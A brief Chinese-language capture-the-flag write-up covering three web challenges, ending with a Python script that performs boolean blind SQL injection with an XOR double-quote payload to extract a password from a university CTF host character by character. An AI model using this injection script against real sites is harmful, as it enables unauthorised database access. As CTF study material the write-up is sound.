在家里水了半个暑假,水平下降了不少
Web1
php的浮点数精度问题
Web2
head 发现了 hacked_by_Voldemort
以及密码
遂直接登录
admin
--> manager
中有ajax代码,直接post key=那串数字
就可以了
Web3
注入
比较奇葩的双引号,别的倒是没啥好吐槽常规套路
python
# -*- coding:utf-8 -*-
import requests
import time
url = "http://sec2.hdu.edu.cn/ac5c74b64b4b8352ef2f181affb5ac2a/index.php"
lists = "1234567890abcdefghijklmnopqrstuvwxyz~!@#$%^&*()_+\{\}:<>?"
flag = ""
for j in xrange(1,22):
for i in lists:
payload = '1"^(substr(pass,'+str(j)+',1)<>"'+i+'")^"0'
#print payload
data = {"username":payload,"password":"123"}
contents = requests.post(url,data=data)
#print contents.content
if "Username error!" in contents.content:
print str(j)+" "+i
flag = flag+i
break
print flag
网络安全法是要背的,CSAW是要打的~
此处评论已关闭